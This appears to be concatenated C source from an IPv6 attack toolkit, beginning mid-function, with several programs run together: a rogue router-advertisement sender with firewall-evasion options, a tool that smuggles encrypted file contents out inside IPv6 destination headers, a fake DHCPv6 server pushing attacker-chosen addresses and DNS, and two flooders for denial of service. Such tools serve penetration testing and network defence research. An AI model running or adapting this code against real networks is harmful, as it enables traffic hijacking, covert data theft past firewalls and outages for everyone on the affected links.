"Error: -R option network is invalid: %s\n", optarg); exit(-1); } rbuf[rcnt][0] = size % 256; memcpy((char *) &rbuf[rcnt][1], routerip6, 16); rcnt++; break; case 'D': if (dcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES); exit(-1); } if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg); exit(-1); } break; case 'L': searchlist = optarg; break; case 'E': if (optarg == NULL) { fprintf(stderr, "Error: no option type given for -E\n"); exit(-1); } for (j = 0; j < strlen(optarg); j++) { switch (optarg[j]) { // fall through to be fail safe on accidental misuse case '0': // fall through case 'O': do_overlap = 1; break; case 'o': do_overlap = 2; break; case '1': // fall through case 'l': // fall through case 'L': do_frag++; break; case 'h': // fall through case 'H': do_hop = 1; break; case 'd': // fall through case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]); exit(-1); } if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) { fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n"); exit(-1); } } break; case 'F': ptr = strtok(optarg, ","); while (ptr != NULL) { if (strncasecmp(ptr, "man", 3) == 0) flags = (flags | 128); else if (strncasecmp(ptr, "oth", 3) == 0) flags = (flags | 64); else if (strncasecmp(ptr, "hom", 3) == 0) flags = (flags | 32); else if (strncasecmp(ptr, "prox", 4) == 0) flags = (flags | 4); else if (strncasecmp(ptr, "res", 3) == 0) flags = (flags | 2); else if (strncasecmp(ptr, "unk", 3) == 0) flags = (flags | 1); else { fprintf(stderr, "Error: unknown flag: %s\n", ptr); exit(-1); } ptr = strtok(NULL, ","); } break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if ((argc - optind) < 1 || (argc - optind) > 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; interface = argv[optind]; if (argc - optind == 2) if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]); exit(-1); } if (mtu == 0) mtu = thc_get_mtu(interface); if (mac6 == NULL) if ((mac6 = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (ip6 == NULL) if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface); exit(-1); } // if (dns == NULL) // dns = thc_resolve6("ff02::fb"); frint = interface; frip6 = ip6; frmac = mac6; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if (llife > 0xffff) llife = 0xffff; llife = (llife | 0xff000000); if (prio == 2) llife = (llife | 0x00080000); else if (prio == 0) llife = (llife | 0x00180000); else if (prio != 1) llife = (llife | 0x00100000); llife = (llife | (flags << 16)); buf[0] = reach / 16777216; buf[1] = (reach % 16777216) / 65536; buf[2] = (reach % 65536) / 256; buf[3] = reach % 256; buf[4] = trans / 16777216; buf[5] = (trans % 16777216) / 65536; buf[6] = (trans % 65536) / 256; buf[7] = trans % 256; // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; i = 16; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); i += 6; // option prefix, put all in if (pcnt > 0) for (j = 0; j < pcnt; j++) { buf[i++] = 3; buf[i++] = 4; buf[i++] = pbuf[j][0]; // prefix length buf[i++] = 128 + 64; buf[i++] = plife / 16777216; buf[i++] = (plife % 16777216) / 65536; buf[i++] = (plife % 65536) / 256; buf[i++] = plife % 256; buf[i++] = (plife / 2) / 16777216; buf[i++] = ((plife / 2) % 16777216) / 65536; buf[i++] = ((plife / 2) % 65536) / 256; buf[i++] = (plife / 2) % 256; i += 4; // + 4 bytes reserved memcpy(&buf[i], (char *) &pbuf[j][1], 16); i += 16; } // route option, put all in if (rcnt > 0) for (j = 0; j < rcnt; j++) { buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = rbuf[j][0]; // prefix length if (prio == 2) buf[i++] = 0x08; // priority, highest of course else if (prio == 1) buf[i++] = 0x00; else if (prio == 0) buf[i++] = 0x18; else buf[i++] == 0x10; buf[i++] = rlife / 16777216; buf[i++] = (rlife % 16777216) / 65536; buf[i++] = (rlife % 65536) / 256; buf[i++] = rlife % 256; memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16); // network i += 16; } // dns option if (dcnt > 0) for (j = 0; j < dcnt; j++) { buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // reserved buf[i++] = dlife / 16777216; buf[i++] = (dlife % 16777216) / 65536; buf[i++] = (dlife % 65536) / 256; buf[i++] = dlife % 256; memcpy(buf + i, dbuf[j], 16); // dns server i += 16; } // dns searchlist option if (searchlist != NULL) { buf[i] = 31; buf[i + 4] = dlife / 16777216; buf[i + 5] = (dlife % 16777216) / 65536; buf[i + 6] = (dlife % 65536) / 256; buf[i + 7] = dlife % 256; if (searchlist[strlen(searchlist) - 1] == '.') searchlist[strlen(searchlist) - 1] = 0; m = 0; while ((ptr = strstr(searchlist, ".,")) != NULL) { m = strlen(ptr); for (l = 1; l < m; l++) ptr[l - 1] = ptr[l]; ptr[m - 1] = 0; } l = 0; m = 0; j = strlen(searchlist); do { k = 0; ptr = index(&searchlist[l], '.'); if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) { k = 1; ptr = index(&searchlist[l], ','); } if (ptr != NULL) *ptr = 0; n = strlen(&searchlist[l]); buf[i + 8 + m] = n; memcpy(&buf[i + 8 + m + 1], &searchlist[l], n); if (ptr == NULL) l = j; else l += 1 + n; m += 1 + n; if (k || ptr == NULL) m++; // end of domain entry } while (l < j && ptr != NULL); if (m % 8 > 0) m = ( (m / 8) + 1 ) * 8; buf[i + 1] = m/8 + 1; i += m + 8; } frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (j = 0; i < do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; //printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap); // init pcap if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } printf("Starting to advertise router (Press Control-C to end) ...\n"); while (sent < to_send || to_send > 255) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232); } else if (do_overlap) { if (do_overlap == 1) thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); else thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); } else { thc_send_pkt(interface, pkt, &pkt_len); } while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0); sent++; if (sent != to_send || to_send > 255) sleep(interval); } return 0; // never reached }
int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, rbuf[3570], wbuf[3570], buf[4000]; unsigned char *src6 = NULL, *dst6 = NULL, srcmac[6] = "", *mac = srcmac, *dmac; int pkt1_len = 0, flags = 0, i = 0, mtu = 0, bytes, seq = 0, id, rounds, wbytes, bufsize = 0, send = 2, num = 0; char *interface, *key = NULL, hash[20], vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };; int rawmode = 0, tcp_port = -1; FILE *f; BF_KEY bfkey; if (argc < 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "rm:k:s:")) >= 0) { switch (i) { case 'r': rawmode = 1; thc_ipv6_rawmode(1); break; case 'k': key = optarg; break; case 'm': mtu = atoi(optarg); break; case 's': send = atoi(optarg); break; default: exit(-1); } } if (argc < optind + 2) { fprintf(stderr, "Error: Not enough parameters!\n"); help(argv[0]); } interface = argv[optind]; dst6 = thc_resolve6(argv[optind + 1]); if ((f = fopen(argv[optind + 2], "r")) == NULL) { fprintf(stderr, "Error: file %s not found\n", argv[optind + 2]); exit(-1); } if (argc >= optind + 4 && argv[optind + 3] != NULL) tcp_port = atoi(argv[optind + 3]); if (mtu == 0) mtu = thc_get_mtu(interface); if (mtu <= 1000) { fprintf(stderr, "Error: MTU of interface %s must be at least 1000 bytes\n", interface); exit(-1); } mac = thc_get_own_mac(interface); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((dmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "Error: can not get MAC for target\n"); exit(-1); } srand(getpid()); mtu -= 128; if (mtu % 255 == 0) i = 2 * (mtu / 255); else i = 2 + 2 * (mtu / 255); mtu = mtu - i; if ((mtu + i + 14) % 8 > 0) mtu = (((mtu + i + 14) / 8) * 8) - (i + 14); if (mtu > 14 * 255) mtu = 14 * 255; if (key != NULL) { memset(&bfkey, 0, sizeof(bfkey)); SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash); BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash); memset(vec, 0, sizeof(vec)); num = 0; } id = rand(); buf[0] = 16; buf[1] = 4; memcpy(buf + 2, (char *) &id, 4); buf[6] = 17; buf[7] = 4; while ((bytes = fread(rbuf, 1, mtu, f)) > 0) { seq++; if (key != NULL) { BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_ENCRYPT); memcpy(rbuf, wbuf, bytes); } memcpy(buf + 8, (char *) &seq, 4); bufsize = 12; rounds = bytes / 255; for (i = 0; i <= rounds; i++) { buf[bufsize] = i + 18; if (i == rounds) wbytes = bytes % 255; else wbytes = 255; buf[bufsize + 1] = wbytes; memcpy(buf + bufsize + 2, rbuf + 255 * i, wbytes); bufsize += wbytes + 2; } if (bytes < mtu) { buf[bufsize] = 0x1f; buf[bufsize + 1] = 0; bufsize = bufsize + 2; } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, bufsize)) return -1; if (tcp_port == -1) { if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, NULL, 0, 0) < 0) return -1; } else { if (thc_add_tcp(pkt1, &pkt1_len, (rand() % 45536) + 10000, tcp_port, rand(), 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; } if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending packet seq# %d\n", seq); for (i = 0; i < send; i++) { thc_send_pkt(interface, pkt1, &pkt1_len); usleep(100); } } printf("All sent.\n"); return 0; }
int main(int argc, char *argv[]) { char *routerip, *interface, mac[16] = ""; char rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024], mybuf[1024]; unsigned char *routerip6, *mac6 = mac, *ip6, *ptr, *ptr1, *ptr2, *ptr3; unsigned char *dns; int size, fromlen = 0, /*mtu = 1500, */ i, j, k, l, m, s, len, t, mlen, csize = 0; static struct iovec iov; struct sockaddr_storage from; struct msghdr mhdr; struct sockaddr_in6 ddst; unsigned long long int count = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (strcmp(argv[1], "-r") == 0) { // is ignored argv++; argc--; } memset(mac, 0, sizeof(mac)); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc >= 6 && (ptr = argv[5]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argc >= 5 && argv[4] != NULL) ip6 = thc_resolve6(argv[4]); else ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); if (argc >= 4 && argv[3] != NULL) dns = thc_resolve6(argv[3]); else dns = thc_resolve6("ff02::fb"); routerip = argv[2]; if ((ptr = index(routerip, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n"); exit(-1); } *ptr++ = 0; size = atoi(ptr); routerip6 = thc_resolve6(routerip); if (routerip6 == NULL || size < 1 || size > 128) { fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[2]); exit(-1); } if (size < 64) { fprintf(stderr, "Warning: network prefix must be a minimum of /64, resizing to /64\n"); size = 64; } if (size % 8 > 0) { size = ((size / 8) + 1) * 8; fprintf(stderr, "Warning: prefix must be a multiple of 8, resizing to /%d\n", csize * 8); } csize = 8 - ((size - 64) / 8); if (dns == NULL) { fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[3]); exit(-1); } if (ip6 == NULL) { fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[4]); exit(-1); } /* if (mtu < 1 || mtu > 65536) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[5]); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu); */ if (mac6 == NULL) { fprintf(stderr, "Error: mac address in invalid\n"); exit(-1); } if ((s = thc_bind_udp_port(547)) < 0) { fprintf(stderr, "Error: could not bind to 547/udp\n"); exit(-1); } if (thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:2")) < 0 || thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")) < 0) { fprintf(stderr, "Error: could not bind multicast address\n"); exit(-1); } if ((t = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) { perror("Error:"); exit(-1); } memset(mybuf, 0, sizeof(mybuf)); mybuf[1] = 2; mybuf[3] = 14; mybuf[5] = 1; mybuf[7] = 1; // mybuf + 8 == time memcpy(mybuf + 12, mac6, 6); mlen = 18; mybuf[mlen + 1] = 23; mybuf[mlen + 3] = 16; memcpy(mybuf + mlen + 4, dns, 16); mlen += 20; printf("Starting to fake dhcp6 server on %s for %s (Press Control-C to end) ...\n\n", interface, argv[2]); while (1) { memset((char *) &from, 0, sizeof(from)); memset(&iov, 0, sizeof(iov)); memset(&mhdr, 0, sizeof(mhdr)); iov.iov_base = rdatabuf; iov.iov_len = sizeof(rdatabuf); mhdr.msg_name = &from; mhdr.msg_namelen = sizeof(from); mhdr.msg_iov = &iov; mhdr.msg_iovlen = 1; mhdr.msg_control = (caddr_t) cmsgbuf; mhdr.msg_controllen = sizeof(cmsgbuf); if ((len = recvmsg(s, &mhdr, 0)) > 0) { fromlen = mhdr.msg_namelen; if (debug) thc_dump_data(rdatabuf, len, "Received Packet"); ddst.sin6_addr = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_addr; ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr); switch (rdatabuf[0]) { case 1: ptr1 = "Solicitate"; break; case 2: ptr1 = "Advertise (illegal, ignored)"; break; case 3: ptr1 = "Request"; break; case 4: ptr1 = "Confirm"; break; case 5: ptr1 = "Renew"; break; case 6: ptr1 = "Rebind"; break; case 7: ptr1 = "Reply (illegal, ignored)"; break; case 8: ptr1 = "Release (ignored)"; break; case 9: ptr1 = "Decline (ignored)"; break; case 10: ptr1 = "Reconfigure (illegal, ignored)"; break; case 11: ptr1 = "Information Request (ignored)"; break; case 12: ptr1 = "Relay Forward (ignored)"; break; case 13: ptr1 = "Relay Reply (ignored)"; break; default: ptr1 = "Unknown (ignored)"; break; } printf("Received DHCP6 %s packet from %s\n", ptr1, ptr2); free(ptr2); if (rdatabuf[0] >= 1 && rdatabuf[0] < 7 && rdatabuf[0] != 2) { memset(wdatabuf, 0, sizeof(wdatabuf)); memcpy(wdatabuf + 1, rdatabuf + 1, 3); i = j = 4; k = -1; if (rdatabuf[0] == 1) { // initial request wdatabuf[0] = 2; while ((j + 4) < len) { l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3]; if (l + j + 4 > len) { l = 0; j = len; printf("Info: received evil packet\n"); } else { if (rdatabuf[j + 1] == 1) { memcpy(wdatabuf + i, rdatabuf + j, l + 4); i += l + 4; } else if (rdatabuf[j + 1] == 3) { k = j; // just set a pointer } j += l + 4; } } // add 02, 23 j = time(NULL); memcpy(mybuf + 8, (char *) &j + _TAKE4, 4); memcpy(wdatabuf + i, mybuf, mlen); i += mlen; // now expand 3 if (k > -1 && rdatabuf[k + 3] == 12 && rdatabuf[k + 2] == 0) { // copy structure memcpy(wdatabuf + i, rdatabuf + k, 16); } else { // or create new wdatabuf[i + 1] = 3; memcpy(wdatabuf + i + 4, (char *) &j + _TAKE4, 4); // copy time as IAID } wdatabuf[i + 3] = 40; memset(wdatabuf + i + 8, 0, 8); wdatabuf[i + 10] = 0x7f; wdatabuf[i + 14] = 0xfe; i += 16; wdatabuf[i + 1] = 5; wdatabuf[i + 3] = 24; memcpy(wdatabuf + i + 4, routerip6, 16); // address count++; if (csize > 0) memcpy(wdatabuf + i + 4 + 16 - csize, (char *) &count, csize); // counter ptr3 = thc_ipv62notation(wdatabuf + i + 4); wdatabuf[i + 21] = 2; wdatabuf[i + 25] = 2; i += 28; } else { wdatabuf[0] = 7; m = 0; while ((j + 4) < len) { l = rdatabuf[j + 2] * 256 + rdatabuf[j + 3]; if (l + j + 4 > len) { l = 0; j = len; printf("Info: received evil packet\n"); } else { // just copy types 1-3 and 23 if ((rdatabuf[j + 1] >= 1 && rdatabuf[j + 1] <= 3) || rdatabuf[j + 1] == 23) { memcpy(wdatabuf + i, rdatabuf + j, l + 4); i += l + 4; if (rdatabuf[j + 1] == 23) k = 1; if (rdatabuf[j + 1] == 3) m = 1; } j += l + 4; } } if (k == -1) { memcpy(wdatabuf + i, mybuf + 18, 20); i += 20; } } len = i; if (debug) thc_dump_data(wdatabuf, len, "Reply Packet"); ddst.sin6_family = AF_INET6; ddst.sin6_port = htons(546); //ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr; ddst.sin6_scope_id = ((struct sockaddr_in6 *) mhdr.msg_name)->sin6_scope_id; if (sendto(t, wdatabuf, len, 0, (struct sockaddr *) &ddst, sizeof(ddst)) < 0) perror("Error:"); else { ptr2 = thc_ipv62notation((char *) &ddst.sin6_addr); if (wdatabuf[0] == 2) { printf("Sent DHCP6 Advertise packet to %s (offer: %s)\n", ptr2, ptr3); free(ptr3); } else if (m) printf("Sent DHCP6 Reply packet to %s (address accepted)\n", ptr2); else printf("Sent DHCP6 Reply packet to %s (did not set address)\n", ptr2); free(ptr2); } } } } /* packet structure: 1 byte = type 3 bytes = sessionid while(packet data) { 2 bytes = type 2 bytes = length in bytes of following data ... defined fixed length data ... } server listen on ff02::1:2 udp 547 client connects from linklocal port 546, ttl 1 01 = solicit 3 bytes = sessionid 6 bytes = blog (elapsed, 8) 8 bytes = 01 blob (client id + time + mac) 4 bytes = time 6 bytes = mac 16 bytes = 03 blob (want perm address) 5 + length + hostname = hostname 18 bytes = blob (vendor class, type 16) 12 bytes = blob (requested options, type 6) server sends to linklocal (respect client port), ttl 1 02 = advertise 3 bytes = sessionid (copy) 18 bytes = 01 blob (client copy of client-id) 8 bytes = 02 blob (server id + time + mac) 4 bytes = time 6 bytes = mac 0003 = give perm address 2 bytes = length 4 bytes = IAID (from client request!) 4 bytes = validity time 1 (1800) 4 bytes = validity time 2 (2880) 0005 = address structure 2 bytes = length (24 bytes) 16 bytes = address 4 bytes = validity time (3600) 4 byte = validity time (same) 0023 = dns option 2 bytes = length (16 bytes) 16 bytes = dns server address client sends to ff02::1:2 ! 03 = request 3 bytes = sessionid 6 bytes = blog (elapsed, 8) 8 bytes = 01 blob (client id + time + mac) 4 bytes = time 6 bytes = mac 18 bytes = client (again) 18 bytes = server (copy) 44 bytes = address (copy) 5 + length + hostname = hostname (again) 18 bytes = blob again (vendor class, type 16) 12 bytes = blob again (requested options, type 6) server replies 7 = reply copy original advertise packet :-) */ return 0; // never reached }
int main(int argc, char *argv[]) { int test = 0, count = 1, tmplen; unsigned char buf[65536], bla[1500], tests[256]; unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i, j, k, srcmtu, fragsize; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500; char *interface; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; if ((dst6 = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target: %s\n", argv[2]); exit(-1); } //route6 = thc_resolve6("2a01::"); memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= 4) test = atoi(argv[3]); memset(null_buffer, 0, sizeof(null_buffer)); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: invalid interface: %s\n", interface); exit(-1); } srcmac = thc_get_own_mac(interface); if (rawmode == 0) { if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } } else dstmac = null_buffer; if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } fragsize = ((srcmtu - 62) / 8) * 8; setvbuf(stdout, NULL, _IONBF, 0); memset(buf, 0, sizeof(buf)); memset(tests, 0, sizeof(tests)); memset(bla, 0, sizeof(bla)); if (test < 1 || test > MAX_TEST) { printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface destination test-case-number\n\n", argv[0]); printf("The following test cases are currently implemented:\n"); printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n"); printf(" 2 : large destination header filled with unknown options\n"); exit(0); } printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]); printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n"); /********************** TEST CASES ************************/ if (test == count) { // 1432 printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count); printf("WARNING: this attack affects all routers on the network path to the target!!\n"); sleep(3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 5; buf[1] = 2; j = 4; i = 2; while (j <= 1408) { k = (i % 63) + 1; buf[j] = k; switch (k) { case 38: // quickstart buf[j + 1] = 6; // length buf[j + 2] = 1; // request type + rate buf[j + 3] = 60; //qs-ttl buf[j + 4] = 8; // nonce j += 8; break; case 5: // prevent router alert option twice buf[j] = 1; // fall through default: buf[j + 1] = 2; j += 4; } j += buf[j + 1] + 2; i++; } for (i = 1; i < 236; i++) { buf[i * 6 - 2] = (i % 63) + 1; buf[i * 6 - 1] = 4; } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 1416) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // 1432 printf("Test %d: large destination header filled with unknown options.\n", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; for (i = 1; i < 237; i++) { buf[6 + i * 6] = (i % 63) + 1; buf[5 + i * 6] = 4; } if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; } count++; if (test == count) { // 1432 // code } count++; /******************* END OF TESTCASES ***************************/ count = 0; while (1) { thc_send_pkt(interface, pkt, &pkt_len); usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; char wdatabuf[1024]; unsigned char *mac6 = mac, *src, *dst; int i, s, len, pkt_len = 0, dlen = 0; unsigned long long int count = 0; pcap_t *p = NULL; int do_all = 1, use_real_mac = 0, use_real_link = 0; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "d:nNr1")) >= 0) { switch (i) { case 'N': use_real_link = 1; // no break case 'n': use_real_mac = 1; break; case '1': do_all = 0; break; case 'd': do_dns = 1; dns_name = optarg; break; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } memset(mac, 0, sizeof(mac)); interface = argv[optind]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) mac6 = thc_get_own_mac(interface); if (argc - optind <= 1) dst = thc_resolve6("ff02::1:2"); else dst = thc_resolve6(argv[optind + 1]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (src == NULL || mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface); exit(-1); } // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } len = sizeof(solicit); memcpy(wdatabuf, solicit, len); if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); } printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface); while (1) { count++; if (!use_real_link) memcpy(src + 8, (char *) &count, 8); // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 32] = rand() % 256; wdatabuf[i + 18] = rand() % 256; mac[i + 2] = rand() % 256; if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } if (!use_real_mac) memcpy(wdatabuf + 22, mac, 6); memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; // we have to tone it down, otherwise we will not get advertisements if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) printf("!"); pkt = thc_destroy_packet(pkt); if (do_all) { usleep(75); while (thc_pcap_check(p, (char *) check_packets, NULL) > 0); } if (count % 1000 == 0) printf("."); } return 0; // never reached }
